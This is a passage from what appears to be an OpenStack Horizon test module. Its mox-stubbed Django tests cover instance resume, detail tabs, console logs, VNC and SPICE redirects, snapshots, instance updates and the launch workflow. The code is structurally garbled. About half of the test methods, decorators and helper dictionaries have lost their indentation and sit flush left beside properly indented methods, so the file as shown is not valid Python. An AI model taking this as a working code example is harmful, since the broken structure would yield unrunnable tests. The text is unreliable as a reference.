    def test_resume_instance_exception(self):
        """A nova error raised by server_resume still redirects back to
        the instances index.
        """
        server = self.servers.first()
        server.status = "SUSPENDED"
        api.nova.extension_supported('AdminActions',
                                     IsA(http.HttpRequest)) \
            .MultipleTimes().AndReturn(True)
        api.nova.flavor_list(IsA(http.HttpRequest)) \
            .AndReturn(self.flavors.list())
        api.glance.image_list_detailed(IgnoreArg()) \
            .AndReturn((self.images.list(), False))
        search_opts = {'marker': None, 'paginate': True}
        api.nova.server_list(IsA(http.HttpRequest), search_opts=search_opts) \
            .AndReturn([self.servers.list(), False])
        api.nova.server_resume(IsA(http.HttpRequest),
                               unicode(server.id)) \
            .AndRaise(self.exceptions.nova)
        self.mox.ReplayAll()
        formData = {'action': 'instances__suspend__%s' % server.id}
        res = self.client.post(INDEX_URL, formData)
        self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs({api.nova: ("server_get",
"instance_volumes_list",
"flavor_get"),
api.network: ("server_security_groups",)})
def test_instance_details_volumes(self):
server = self.servers.first()
volumes = [self.volumes.list()[1]]
api.nova.server_get(IsA(http.HttpRequest), server.id).AndReturn(server)
api.nova.instance_volumes_list(IsA(http.HttpRequest),
server.id).AndReturn(volumes)
api.nova.flavor_get(IsA(http.HttpRequest), server.flavor['id']) \
.AndReturn(self.flavors.first())
api.network.server_security_groups(IsA(http.HttpRequest), server.id) \
.AndReturn(self.security_groups.first())
self.mox.ReplayAll()
url = reverse('horizon:project:instances:detail',
args=[server.id])
res = self.client.get(url)
self.assertItemsEqual(res.context['instance'].volumes, volumes)
@test.create_stubs({api.nova: ("server_get",
"instance_volumes_list",
"flavor_get"),
api.network: ("server_security_groups",)})
def test_instance_details_volume_sorting(self):
server = self.servers.first()
volumes = self.volumes.list()[1:3]
api.nova.server_get(IsA(http.HttpRequest), server.id).AndReturn(server)
api.nova.instance_volumes_list(IsA(http.HttpRequest),
server.id).AndReturn(volumes)
api.nova.flavor_get(IsA(http.HttpRequest), server.flavor['id']) \
.AndReturn(self.flavors.first())
api.network.server_security_groups(IsA(http.HttpRequest), server.id) \
.AndReturn(self.security_groups.first())
self.mox.ReplayAll()
url = reverse('horizon:project:instances:detail',
args=[server.id])
res = self.client.get(url)
self.assertItemsEqual(res.context['instance'].volumes, volumes)
self.assertEqual(res.context['instance'].volumes[0].device,
"/dev/hda")
self.assertEqual(res.context['instance'].volumes[1].device,
"/dev/hdk")
    @test.create_stubs({api.nova: ("server_get",
                                   "instance_volumes_list",
                                   "flavor_get"),
                        api.network: ("server_security_groups",)})
    def test_instance_details_metadata(self):
        """The overview tab renders instance metadata, escaping HTML in
        keys/values and showing N/A for empty values.
        """
        server = self.servers.first()
        api.nova.server_get(IsA(http.HttpRequest), server.id).AndReturn(server)
        api.nova.instance_volumes_list(IsA(http.HttpRequest),
                                       server.id).AndReturn([])
        api.nova.flavor_get(IsA(http.HttpRequest), server.flavor['id']) \
            .AndReturn(self.flavors.first())
        api.network.server_security_groups(IsA(http.HttpRequest), server.id) \
            .AndReturn(self.security_groups.list())
        self.mox.ReplayAll()
        url = reverse('horizon:project:instances:detail',
                      args=[server.id])
        tg = tabs.InstanceDetailTabs(self.request, instance=server)
        qs = "?%s=%s" % (tg.param_name, tg.get_tab("overview").get_id())
        res = self.client.get(url + qs)
        # The expected markup shows HTML in metadata is escaped
        # (&lt;b&gt;) and comment-like values are rendered literally.
        self.assertContains(res, "<dd>keyName</dd>", 1)
        self.assertContains(res, "<dt>someMetaLabel</dt>", 1)
        self.assertContains(res, "<dd>someMetaData</dd>", 1)
        self.assertContains(res, "<dt>some&lt;b&gt;html&lt;/b&gt;label</dt>",
                            1)
        self.assertContains(res, "<dd>&lt;!--</dd>", 1)
        self.assertContains(res, "<dt>empty</dt>", 1)
        self.assertContains(res, "<dd><em>N/A</em></dd>", 1)
    @test.create_stubs({api.nova: ('server_console_output',)})
    def test_instance_log(self):
        """The log tab renders the console output returned by nova."""
        server = self.servers.first()
        CONSOLE_OUTPUT = 'output'
        api.nova.server_console_output(IsA(http.HttpRequest),
                                       server.id, tail_length=None) \
            .AndReturn(CONSOLE_OUTPUT)
        self.mox.ReplayAll()
        url = reverse('horizon:project:instances:console',
                      args=[server.id])
        tg = tabs.InstanceDetailTabs(self.request, instance=server)
        qs = "?%s=%s" % (tg.param_name, tg.get_tab("log").get_id())
        res = self.client.get(url + qs)
        self.assertNoMessages()
        self.assertIsInstance(res, http.HttpResponse)
        self.assertContains(res, CONSOLE_OUTPUT)
@test.create_stubs({api.nova: ('server_console_output',)})
def test_instance_log_exception(self):
server = self.servers.first()
api.nova.server_console_output(IsA(http.HttpRequest),
server.id, tail_length=None) \
.AndRaise(self.exceptions.nova)
self.mox.ReplayAll()
url = reverse('horizon:project:instances:console',
args=[server.id])
tg = tabs.InstanceDetailTabs(self.request, instance=server)
qs = "?%s=%s" % (tg.param_name, tg.get_tab("log").get_id())
res = self.client.get(url + qs)
self.assertContains(res, "Unable to get log for")
    def test_instance_vnc(self):
        """The VNC view redirects to the console URL with the instance
        name appended as a title parameter.
        """
        server = self.servers.first()
        CONSOLE_OUTPUT = '/vncserver'
        # Stubs are created manually here (no @create_stubs decorator)
        # because a mocked VNCConsole object must be returned.
        console_mock = self.mox.CreateMock(api.nova.VNCConsole)
        console_mock.url = CONSOLE_OUTPUT
        self.mox.StubOutWithMock(api.nova, 'server_vnc_console')
        self.mox.StubOutWithMock(api.nova, 'server_get')
        api.nova.server_get(IsA(http.HttpRequest), server.id) \
            .AndReturn(server)
        api.nova.server_vnc_console(IgnoreArg(), server.id) \
            .AndReturn(console_mock)
        self.mox.ReplayAll()
        url = reverse('horizon:project:instances:vnc',
                      args=[server.id])
        res = self.client.get(url)
        redirect = CONSOLE_OUTPUT + '&title=%s(1)' % server.name
        self.assertRedirectsNoFollow(res, redirect)
@test.create_stubs({api.nova: ('server_vnc_console',)})
def test_instance_vnc_exception(self):
server = self.servers.first()
api.nova.server_vnc_console(IsA(http.HttpRequest), server.id) \
.AndRaise(self.exceptions.nova)
self.mox.ReplayAll()
url = reverse('horizon:project:instances:vnc',
args=[server.id])
res = self.client.get(url)
self.assertRedirectsNoFollow(res, INDEX_URL)
    def test_instance_spice(self):
        """The SPICE view redirects to the console URL with the instance
        name appended as a title parameter.
        """
        server = self.servers.first()
        CONSOLE_OUTPUT = '/spiceserver'
        # Stubs are created manually here (no @create_stubs decorator)
        # because a mocked SPICEConsole object must be returned.
        console_mock = self.mox.CreateMock(api.nova.SPICEConsole)
        console_mock.url = CONSOLE_OUTPUT
        self.mox.StubOutWithMock(api.nova, 'server_spice_console')
        self.mox.StubOutWithMock(api.nova, 'server_get')
        api.nova.server_get(IsA(http.HttpRequest), server.id) \
            .AndReturn(server)
        api.nova.server_spice_console(IgnoreArg(), server.id) \
            .AndReturn(console_mock)
        self.mox.ReplayAll()
        url = reverse('horizon:project:instances:spice',
                      args=[server.id])
        res = self.client.get(url)
        redirect = CONSOLE_OUTPUT + '&title=%s(1)' % server.name
        self.assertRedirectsNoFollow(res, redirect)
@test.create_stubs({api.nova: ('server_spice_console',)})
def test_instance_spice_exception(self):
server = self.servers.first()
api.nova.server_spice_console(IsA(http.HttpRequest), server.id) \
.AndRaise(self.exceptions.nova)
self.mox.ReplayAll()
url = reverse('horizon:project:instances:spice',
args=[server.id])
res = self.client.get(url)
self.assertRedirectsNoFollow(res, INDEX_URL)
    @test.create_stubs({api.nova: ('server_get',
                                   'snapshot_create',
                                   'server_list',
                                   'flavor_list',
                                   'server_delete'),
                        cinder: ('volume_snapshot_list',
                                 'volume_list',),
                        api.glance: ('image_list_detailed',)})
    def test_create_instance_snapshot(self):
        """Submitting the CreateSnapshot form calls nova snapshot_create
        and redirects to the images & snapshots index.
        """
        server = self.servers.first()
        api.nova.server_get(IsA(http.HttpRequest), server.id).AndReturn(server)
        api.nova.snapshot_create(IsA(http.HttpRequest),
                                 server.id,
                                 "snapshot1").AndReturn(self.snapshots.first())
        api.glance.image_list_detailed(IsA(http.HttpRequest),
                                       marker=None).AndReturn([[], False])
        cinder.volume_snapshot_list(IsA(http.HttpRequest)).AndReturn([])
        cinder.volume_list(IsA(http.HttpRequest)).AndReturn([])
        self.mox.ReplayAll()
        formData = {'instance_id': server.id,
                    'method': 'CreateSnapshot',
                    'name': 'snapshot1'}
        url = reverse('horizon:project:images_and_snapshots:snapshots:create',
                      args=[server.id])
        redir_url = reverse('horizon:project:images_and_snapshots:index')
        res = self.client.post(url, formData)
        self.assertRedirects(res, redir_url)
instance_update_get_stubs = {
api.nova: ('server_get',),
api.network: ('security_group_list',
'server_security_groups',)}
    @test.create_stubs(instance_update_get_stubs)
    def test_instance_update_get(self):
        """GET on the update view renders the workflow template."""
        server = self.servers.first()
        api.nova.server_get(IsA(http.HttpRequest), server.id).AndReturn(server)
        api.network.security_group_list(IsA(http.HttpRequest)) \
            .AndReturn([])
        api.network.server_security_groups(IsA(http.HttpRequest),
                                           server.id).AndReturn([])
        self.mox.ReplayAll()
        url = reverse('horizon:project:instances:update', args=[server.id])
        res = self.client.get(url)
        self.assertTemplateUsed(res, views.WorkflowView.template_name)
@test.create_stubs(instance_update_get_stubs)
def test_instance_update_get_server_get_exception(self):
server = self.servers.first()
api.nova.server_get(IsA(http.HttpRequest), server.id) \
.AndRaise(self.exceptions.nova)
self.mox.ReplayAll()
url = reverse('horizon:project:instances:update',
args=[server.id])
res = self.client.get(url)
self.assertRedirectsNoFollow(res, INDEX_URL)
def _instance_update_post(self, server_id, server_name, secgroups):
default_role_field_name = 'default_' + \
workflows.update_instance.INSTANCE_SEC_GROUP_SLUG + '_role'
formData = {'name': server_name,
default_role_field_name: 'member',
SEC_GROUP_ROLE_PREFIX + 'member': secgroups}
url = reverse('horizon:project:instances:update',
args=[server_id])
return self.client.post(url, formData)
instance_update_post_stubs = {
api.nova: ('server_get', 'server_update'),
api.network: ('security_group_list',
'server_security_groups',
'server_update_security_groups')}
    @test.create_stubs(instance_update_post_stubs)
    def test_instance_update_post(self):
        """A successful update renames the server and replaces its
        security groups with the requested set.
        """
        server = self.servers.first()
        secgroups = self.security_groups.list()[:3]
        # Server starts with groups 0 and 1; the form requests 1 and 2,
        # so group 0 is removed and group 2 added.
        server_groups = [secgroups[0], secgroups[1]]
        wanted_groups = [secgroups[1].id, secgroups[2].id]
        api.nova.server_get(IsA(http.HttpRequest), server.id).AndReturn(server)
        api.network.security_group_list(IsA(http.HttpRequest)) \
            .AndReturn(secgroups)
        api.network.server_security_groups(IsA(http.HttpRequest),
                                           server.id).AndReturn(server_groups)
        api.nova.server_update(IsA(http.HttpRequest),
                               server.id,
                               server.name).AndReturn(server)
        api.network.server_update_security_groups(IsA(http.HttpRequest),
                                                  server.id,
                                                  wanted_groups)
        self.mox.ReplayAll()
        res = self._instance_update_post(server.id, server.name, wanted_groups)
        self.assertNoFormErrors(res)
        self.assertRedirectsNoFollow(res, INDEX_URL)
    @test.create_stubs(instance_update_post_stubs)
    def test_instance_update_post_api_exception(self):
        """A server_update failure still proceeds to update security
        groups and redirects to the index.
        """
        server = self.servers.first()
        api.nova.server_get(IsA(http.HttpRequest), server.id).AndReturn(server)
        api.network.security_group_list(IsA(http.HttpRequest)) \
            .AndReturn([])
        api.network.server_security_groups(IsA(http.HttpRequest),
                                           server.id).AndReturn([])
        api.nova.server_update(IsA(http.HttpRequest), server.id, server.name) \
            .AndRaise(self.exceptions.nova)
        api.network.server_update_security_groups(
            IsA(http.HttpRequest), server.id, [])
        self.mox.ReplayAll()
        res = self._instance_update_post(server.id, server.name, [])
        self.assertRedirectsNoFollow(res, INDEX_URL)
    @test.create_stubs(instance_update_post_stubs)
    def test_instance_update_post_secgroup_api_exception(self):
        """A security-group update failure after a successful rename
        still redirects to the index.
        """
        server = self.servers.first()
        api.nova.server_get(IsA(http.HttpRequest), server.id).AndReturn(server)
        api.network.security_group_list(IsA(http.HttpRequest)) \
            .AndReturn([])
        api.network.server_security_groups(IsA(http.HttpRequest),
                                           server.id).AndReturn([])
        api.nova.server_update(IsA(http.HttpRequest),
                               server.id,
                               server.name).AndReturn(server)
        api.network.server_update_security_groups(
            IsA(http.HttpRequest),
            server.id, []).AndRaise(self.exceptions.nova)
        self.mox.ReplayAll()
        res = self._instance_update_post(server.id, server.name, [])
        self.assertRedirectsNoFollow(res, INDEX_URL)
    @test.create_stubs({api.nova: ('flavor_list',
                                   'keypair_list',
                                   'tenant_absolute_limits',
                                   'availability_zone_list',),
                        api.network: ('security_group_list',),
                        cinder: ('volume_snapshot_list',
                                 'volume_list',),
                        api.neutron: ('network_list',
                                      'profile_list',),
                        api.glance: ('image_list_detailed',)})
    def test_launch_instance_get(self):
        """GET on the launch view pre-selects the requested image and
        builds the expected workflow steps.
        """
        image = self.images.first()
        cinder.volume_list(IsA(http.HttpRequest)) \
            .AndReturn(self.volumes.list())
        cinder.volume_snapshot_list(IsA(http.HttpRequest)) \
            .AndReturn(self.volumes.list())
        # Public and project-owned images are fetched separately.
        api.glance.image_list_detailed(IsA(http.HttpRequest),
                                       filters={'is_public': True,
                                                'status': 'active'}) \
            .AndReturn([self.images.list(), False])
        api.glance.image_list_detailed(IsA(http.HttpRequest),
            filters={'property-owner_id': self.tenant.id,
                     'status': 'active'}) \
            .AndReturn([[], False])
        # Tenant networks and shared networks are fetched separately.
        api.neutron.network_list(IsA(http.HttpRequest),
                                 tenant_id=self.tenant.id,
                                 shared=False) \
            .AndReturn(self.networks.list()[:1])
        api.neutron.network_list(IsA(http.HttpRequest),
                                 shared=True) \
            .AndReturn(self.networks.list()[1:])
        # TODO(absubram): Remove if clause and create separate
        # test stubs for when profile_support is being used.
        # Additionally ensure those are always run even in default setting
        if api.neutron.is_port_profiles_supported():
            policy_profiles = self.policy_profiles.list()
            api.neutron.profile_list(IsA(http.HttpRequest),
                                     'policy').AndReturn(policy_profiles)
        api.nova.tenant_absolute_limits(IsA(http.HttpRequest))\
            .AndReturn(self.limits['absolute'])
        api.nova.flavor_list(IsA(http.HttpRequest)) \
            .AndReturn(self.flavors.list())
        api.nova.flavor_list(IsA(http.HttpRequest)) \
            .AndReturn(self.flavors.list())
        api.nova.keypair_list(IsA(http.HttpRequest)) \
            .AndReturn(self.keypairs.list())
        api.network.security_group_list(IsA(http.HttpRequest)) \
            .AndReturn(self.security_groups.list())
        api.nova.availability_zone_list(IsA(http.HttpRequest)) \
            .AndReturn(self.availability_zones.list())
        self.mox.ReplayAll()
        url = reverse('horizon:project:instances:launch')
        params = urlencode({"source_type": "image_id",
                            "source_id": image.id})
        res = self.client.get("%s?%s" % (url, params))
        workflow = res.context['workflow']
        self.assertTemplateUsed(res, views.WorkflowView.template_name)
        self.assertEqual(res.context['workflow'].name,
                         workflows.LaunchInstance.name)
        step = workflow.get_step("setinstancedetailsaction")
        self.assertEqual(step.action.initial['image_id'], image.id)
        self.assertQuerysetEqual(workflow.steps,
                            ['<SetInstanceDetails: setinstancedetailsaction>',
                             '<SetAccessControls: setaccesscontrolsaction>',
                             '<SetNetwork: setnetworkaction>',
                             '<PostCreationStep: customizeaction>'])
    @test.create_stubs({api.glance: ('image_list_detailed',),
                        api.neutron: ('network_list',
                                      'profile_list',
                                      'port_create',),
                        api.nova: ('flavor_list',
                                   'keypair_list',
                                   'availability_zone_list',
                                   'server_create',),
                        api.network: ('security_group_list',),
                        cinder: ('volume_list',
                                 'volume_snapshot_list',),
                        quotas: ('tenant_quota_usages',)})
    def test_launch_instance_post(self):
        """Submitting the launch workflow boots from an image and passes
        all form fields through to nova server_create.
        """
        flavor = self.flavors.first()
        image = self.images.first()
        keypair = self.keypairs.first()
        server = self.servers.first()
        sec_group = self.security_groups.first()
        avail_zone = self.availability_zones.first()
        customization_script = 'user data'
        nics = [{"net-id": self.networks.first().id, "v4-fixed-ip": ''}]
        quota_usages = self.quota_usages.first()
        api.nova.flavor_list(IsA(http.HttpRequest)) \
            .AndReturn(self.flavors.list())
        api.nova.keypair_list(IsA(http.HttpRequest)) \
            .AndReturn(self.keypairs.list())
        api.network.security_group_list(IsA(http.HttpRequest)) \
            .AndReturn(self.security_groups.list())
        api.nova.availability_zone_list(IsA(http.HttpRequest)) \
            .AndReturn(self.availability_zones.list())
        api.glance.image_list_detailed(IsA(http.HttpRequest),
                                       filters={'is_public': True,
                                                'status': 'active'}) \
            .AndReturn([self.images.list(), False])
        api.glance.image_list_detailed(IsA(http.HttpRequest),
            filters={'property-owner_id': self.tenant.id,
                     'status': 'active'}) \
            .AndReturn([[], False])
        api.neutron.network_list(IsA(http.HttpRequest),
                                 tenant_id=self.tenant.id,
                                 shared=False) \
            .AndReturn(self.networks.list()[:1])
        api.neutron.network_list(IsA(http.HttpRequest),
                                 shared=True) \
            .AndReturn(self.networks.list()[1:])
        # TODO(absubram): Remove if clause and create separate
        # test stubs for when profile_support is being used.
        # Additionally ensure those are always run even in default setting
        if api.neutron.is_port_profiles_supported():
            policy_profiles = self.policy_profiles.list()
            policy_profile_id = self.policy_profiles.first().id
            port = self.ports.first()
            api.neutron.profile_list(
                IsA(http.HttpRequest),
                'policy').AndReturn(policy_profiles)
            api.neutron.port_create(
                IsA(http.HttpRequest),
                network_id=self.networks.first().id,
                policy_profile_id=policy_profile_id).AndReturn(port)
        cinder.volume_list(IsA(http.HttpRequest)) \
            .AndReturn([])
        cinder.volume_snapshot_list(IsA(http.HttpRequest)).AndReturn([])
        # No block-device mapping: this scenario boots from the image.
        api.nova.server_create(IsA(http.HttpRequest),
                               server.name,
                               image.id,
                               flavor.id,
                               keypair.name,
                               customization_script,
                               [sec_group.name],
                               block_device_mapping=None,
                               block_device_mapping_v2=None,
                               nics=nics,
                               availability_zone=avail_zone.zoneName,
                               instance_count=IsA(int),
                               admin_pass=u'')
        quotas.tenant_quota_usages(IsA(http.HttpRequest)) \
            .AndReturn(quota_usages)
        self.mox.ReplayAll()
        form_data = {'flavor': flavor.id,
                     'source_type': 'image_id',
                     'image_id': image.id,
                     'keypair': keypair.name,
                     'name': server.name,
                     'customization_script': customization_script,
                     'project_id': self.tenants.first().id,
                     'user_id': self.user.id,
                     'groups': sec_group.name,
                     'availability_zone': avail_zone.zoneName,
                     'volume_type': '',
                     'network': self.networks.first().id,
                     'count': 1}
        url = reverse('horizon:project:instances:launch')
        res = self.client.post(url, form_data)
        self.assertNoFormErrors(res)
        self.assertRedirectsNoFollow(res, INDEX_URL)
    @test.create_stubs({api.glance: ('image_list_detailed',),
                        api.neutron: ('network_list',
                                      'profile_list',),
                        api.nova: ('flavor_list',
                                   'keypair_list',
                                   'availability_zone_list',
                                   'server_create',),
                        api.network: ('security_group_list',),
                        cinder: ('volume_list',
                                 'volume_snapshot_list',),
                        quotas: ('tenant_quota_usages',)})
    def test_launch_instance_post_boot_from_volume(self):
        """Launching with a volume source passes an empty image id and a
        block-device mapping for the chosen volume/device to server_create.
        """
        flavor = self.flavors.first()
        keypair = self.keypairs.first()
        server = self.servers.first()
        volume = self.volumes.first()
        sec_group = self.security_groups.first()
        avail_zone = self.availability_zones.first()
        customization_script = 'user data'
        device_name = u'vda'
        volume_choice = "%s:vol" % volume.id
        block_device_mapping = {device_name: u"%s::0" % volume_choice}
        nics = [{"net-id": self.networks.first().id, "v4-fixed-ip": ''}]
        quota_usages = self.quota_usages.first()
        api.nova.flavor_list(IsA(http.HttpRequest)) \
            .AndReturn(self.flavors.list())
        api.nova.keypair_list(IsA(http.HttpRequest)) \
            .AndReturn(self.keypairs.list())
        api.network.security_group_list(IsA(http.HttpRequest)) \
            .AndReturn(self.security_groups.list())
        api.nova.availability_zone_list(IsA(http.HttpRequest)) \
            .AndReturn(self.availability_zones.list())
        api.glance.image_list_detailed(IsA(http.HttpRequest),
                                       filters={'is_public': True,
                                                'status': 'active'}) \
            .AndReturn([self.images.list(), False])
        api.glance.image_list_detailed(IsA(http.HttpRequest),
            filters={'property-owner_id': self.tenant.id,
                     'status': 'active'}) \
            .AndReturn([[], False])
        api.neutron.network_list(IsA(http.HttpRequest),
                                 tenant_id=self.tenant.id,
                                 shared=False) \
            .AndReturn(self.networks.list()[:1])
        api.neutron.network_list(IsA(http.HttpRequest),
                                 shared=True) \
            .AndReturn(self.networks.list()[1:])
        # TODO(absubram): Remove if clause and create separate
        # test stubs for when profile_support is being used.
        # Additionally ensure those are always run even in default setting
        if api.neutron.is_port_profiles_supported():
            policy_profiles = self.policy_profiles.list()
            policy_profile_id = self.policy_profiles.first().id
            port = self.ports.first()
            api.neutron.profile_list(
                IsA(http.HttpRequest),
                'policy').AndReturn(policy_profiles)
            api.neutron.port_create(
                IsA(http.HttpRequest),
                network_id=self.networks.first().id,
                policy_profile_id=policy_profile_id).AndReturn(port)
            # With port profiles, the instance attaches to the created
            # port instead of the network.
            nics = [{"port-id": port.id}]
        cinder.volume_list(IsA(http.HttpRequest)) \
            .AndReturn(self.volumes.list())
        cinder.volume_snapshot_list(IsA(http.HttpRequest)).AndReturn([])
        # Image id is empty: the instance boots from the mapped volume.
        api.nova.server_create(IsA(http.HttpRequest),
                               server.name,
                               '',
                               flavor.id,
                               keypair.name,
                               customization_script,
                               [sec_group.name],
                               block_device_mapping=block_device_mapping,
                               block_device_mapping_v2=None,
                               nics=nics,
                               availability_zone=avail_zone.zoneName,
                               instance_count=IsA(int),
                               admin_pass=u'')
        quotas.tenant_quota_usages(IsA(http.HttpRequest)) \
            .AndReturn(quota_usages)
        self.mox.ReplayAll()
        form_data = {'flavor': flavor.id,
                     'source_type': 'volume_id',
                     'source_id': volume_choice,
                     'keypair': keypair.name,
                     'name': server.name,
                     'customization_script': customization_script,
                     'project_id': self.tenants.first().id,
                     'user_id': self.user.id,
                     'groups': sec_group.name,
                     'availability_zone': avail_zone.zoneName,
                     'volume_size': '1',
                     'volume_id': volume_choice,
                     'device_name': device_name,
                     'network': self.networks.first().id,
                     'count': 1}
        url = reverse('horizon:project:instances:launch')
        res = self.client.post(url, form_data)
        self.assertNoFormErrors(res)
        self.assertRedirectsNoFollow(res, INDEX_URL)
    @test.create_stubs({api.glance: ('image_list_detailed',),
                        api.neutron: ('network_list',
                                      'profile_list',
                                      'port_create'),
                        api.nova: ('server_create',
                                   'flavor_list',
                                   'keypair_list',
                                   'availability_zone_list',
                                   'tenant_absolute_limits',),
                        api.network: ('security_group_list',),
                        cinder: ('volume_list',
                                 'volume_snapshot_list',),
                        quotas: ('tenant_quota_usages',)})
    def test_launch_instance_post_no_images_available_boot_from_volume(self):
        """Booting from a volume succeeds even when the form omits an
        image id entirely.
        """
        flavor = self.flavors.first()
        keypair = self.keypairs.first()
        server = self.servers.first()
        volume = self.volumes.first()
        sec_group = self.security_groups.first()
        avail_zone = self.availability_zones.first()
        customization_script = 'user data'
        device_name = u'vda'
        volume_choice = "%s:vol" % volume.id
        block_device_mapping = {device_name: u"%s::0" % volume_choice}
        nics = [{"net-id": self.networks.first().id, "v4-fixed-ip": ''}]
        quota_usages = self.quota_usages.first()
        api.nova.flavor_list(IsA(http.HttpRequest)) \
            .AndReturn(self.flavors.list())
        api.nova.keypair_list(IsA(http.HttpRequest)) \
            .AndReturn(self.keypairs.list())
        api.network.security_group_list(IsA(http.HttpRequest)) \
            .AndReturn(self.security_groups.list())
        api.nova.availability_zone_list(IsA(http.HttpRequest)) \
            .AndReturn(self.availability_zones.list())
        api.glance.image_list_detailed(IsA(http.HttpRequest),
                                       filters={'is_public': True,
                                                'status': 'active'}) \
            .AndReturn([self.images.list(), False])
        api.glance.image_list_detailed(IsA(http.HttpRequest),
            filters={'property-owner_id': self.tenant.id,
                     'status': 'active'}) \
            .AndReturn([[], False])
        api.neutron.network_list(IsA(http.HttpRequest),
                                 tenant_id=self.tenant.id,
                                 shared=False) \
            .AndReturn(self.networks.list()[:1])
        api.neutron.network_list(IsA(http.HttpRequest),
                                 shared=True) \
            .AndReturn(self.networks.list()[1:])
        # TODO(absubram): Remove if clause and create separate
        # test stubs for when profile_support is being used.
        # Additionally ensure those are always run even in default setting
        if api.neutron.is_port_profiles_supported():
            policy_profiles = self.policy_profiles.list()
            policy_profile_id = self.policy_profiles.first().id
            port = self.ports.first()
            api.neutron.profile_list(
                IsA(http.HttpRequest),
                'policy').AndReturn(policy_profiles)
            api.neutron.port_create(
                IsA(http.HttpRequest),
                network_id=self.networks.first().id,
                policy_profile_id=policy_profile_id).AndReturn(port)
            # With port profiles, the instance attaches to the created
            # port instead of the network.
            nics = [{"port-id": port.id}]
        cinder.volume_list(IsA(http.HttpRequest)) \
            .AndReturn(self.volumes.list())
        cinder.volume_snapshot_list(IsA(http.HttpRequest)).AndReturn([])
        quotas.tenant_quota_usages(IsA(http.HttpRequest)) \
            .AndReturn(quota_usages)
        api.nova.server_create(IsA(http.HttpRequest),
                               server.name,
                               '',
                               flavor.id,
                               keypair.name,
                               customization_script,
                               [sec_group.name],
                               block_device_mapping=block_device_mapping,
                               block_device_mapping_v2=None,
                               nics=nics,
                               availability_zone=avail_zone.zoneName,
                               instance_count=IsA(int),
                               admin_pass=u'')
        self.mox.ReplayAll()
        form_data = {'flavor': flavor.id,
                     'source_type': 'volume_id',
                     # 'image_id' is intentionally omitted: no images are
                     # available in this scenario.
                     'keypair': keypair.name,
                     'name': server.name,
                     'customization_script': customization_script,
                     'project_id': self.tenants.first().id,
                     'user_id': self.user.id,
                     'groups': sec_group.name,
                     'availability_zone': avail_zone.zoneName,
                     'network': self.networks.first().id,
                     'volume_type': 'volume_id',
                     'volume_id': volume_choice,
                     'device_name': device_name,
                     'count': 1}
        url = reverse('horizon:project:instances:launch')
        res = self.client.post(url, form_data)
        self.assertNoFormErrors(res)
        self.assertRedirectsNoFollow(res, INDEX_URL)
    @test.create_stubs({api.glance: ('image_list_detailed',),
                        api.neutron: ('network_list',
                                      'profile_list',),
                        api.nova: ('flavor_list',
                                   'keypair_list',
                                   'availability_zone_list',
                                   'tenant_absolute_limits',),
                        api.network: ('security_group_list',),
                        cinder: ('volume_list',
                                 'volume_snapshot_list',),
                        quotas: ('tenant_quota_usages',)})
    def test_launch_instance_post_no_images_available(self):
        """Posting the launch form with no image chosen raises a form error.

        Both glance listings are stubbed to return empty lists, and the
        form is posted with an empty ``image_id``; the workflow must report
        exactly one "You must select an image." error and re-render the
        workflow view instead of creating a server.
        """
        flavor = self.flavors.first()
        keypair = self.keypairs.first()
        server = self.servers.first()
        sec_group = self.security_groups.first()
        avail_zone = self.availability_zones.first()
        customization_script = 'user data'
        quota_usages = self.quota_usages.first()
        # Mox expectations are recorded in the order the workflow calls them.
        api.nova.flavor_list(IsA(http.HttpRequest)) \
            .AndReturn(self.flavors.list())
        api.nova.tenant_absolute_limits(IsA(http.HttpRequest)) \
            .AndReturn(self.limits['absolute'])
        # No public and no project-owned images are available.
        api.glance.image_list_detailed(IsA(http.HttpRequest),
                                       filters={'is_public': True,
                                                'status': 'active'}) \
            .AndReturn([[], False])
        api.glance.image_list_detailed(IsA(http.HttpRequest),
            filters={'property-owner_id': self.tenant.id,
                     'status': 'active'}) \
            .AndReturn([[], False])
        api.neutron.network_list(IsA(http.HttpRequest),
                                 tenant_id=self.tenant.id,
                                 shared=False) \
            .AndReturn(self.networks.list()[:1])
        api.neutron.network_list(IsA(http.HttpRequest),
                                 shared=True) \
            .AndReturn(self.networks.list()[1:])
        # TODO(absubram): Remove if clause and create separate
        # test stubs for when profile_support is being used.
        # Additionally ensure those are always run even in default setting
        if api.neutron.is_port_profiles_supported():
            policy_profiles = self.policy_profiles.list()
            api.neutron.profile_list(IsA(http.HttpRequest),
                                     'policy').AndReturn(policy_profiles)
        api.nova.flavor_list(IsA(http.HttpRequest)) \
            .AndReturn(self.flavors.list())
        api.nova.keypair_list(IsA(http.HttpRequest)) \
            .AndReturn(self.keypairs.list())
        api.network.security_group_list(IsA(http.HttpRequest)) \
            .AndReturn(self.security_groups.list())
        api.nova.availability_zone_list(IsA(http.HttpRequest)) \
            .AndReturn(self.availability_zones.list())
        cinder.volume_list(IsA(http.HttpRequest)) \
            .AndReturn([])
        cinder.volume_snapshot_list(IsA(http.HttpRequest)).AndReturn([])
        quotas.tenant_quota_usages(IsA(http.HttpRequest)) \
            .AndReturn(quota_usages)
        self.mox.ReplayAll()
        # 'image_id' is deliberately empty to trigger the validation error.
        form_data = {'flavor': flavor.id,
                     'source_type': 'image_id',
                     'image_id': '',
                     'keypair': keypair.name,
                     'name': server.name,
                     'customization_script': customization_script,
                     'project_id': self.tenants.first().id,
                     'user_id': self.user.id,
                     'groups': sec_group.name,
                     'availability_zone': avail_zone.zoneName,
                     'volume_type': '',
                     'count': 1}
        url = reverse('horizon:project:instances:launch')
        res = self.client.post(url, form_data)
        self.assertFormErrors(res, 1, "You must select an image.")
        self.assertTemplateUsed(res, views.WorkflowView.template_name)
    @test.create_stubs({api.glance: ('image_list_detailed',),
                        api.neutron: ('network_list',
                                      'profile_list',),
                        cinder: ('volume_list',
                                 'volume_snapshot_list',),
                        api.network: ('security_group_list',),
                        api.nova: ('flavor_list',
                                   'keypair_list',
                                   'tenant_absolute_limits',
                                   'availability_zone_list',)})
    def test_launch_flavorlist_error(self):
        """The launch view still renders when nova flavor_list fails.

        Both flavor_list expectations raise the stubbed nova exception; a
        GET of the launch workflow must still use the workflow template
        rather than erroring out.
        """
        cinder.volume_list(IsA(http.HttpRequest)) \
            .AndReturn(self.volumes.list())
        # NOTE(review): snapshot listing is stubbed with volume fixtures —
        # presumably only the count matters here; confirm against the view.
        cinder.volume_snapshot_list(IsA(http.HttpRequest)) \
            .AndReturn(self.volumes.list())
        api.glance.image_list_detailed(IsA(http.HttpRequest),
                                       filters={'is_public': True,
                                                'status': 'active'}) \
            .AndReturn([self.images.list(), False])
        api.glance.image_list_detailed(IsA(http.HttpRequest),
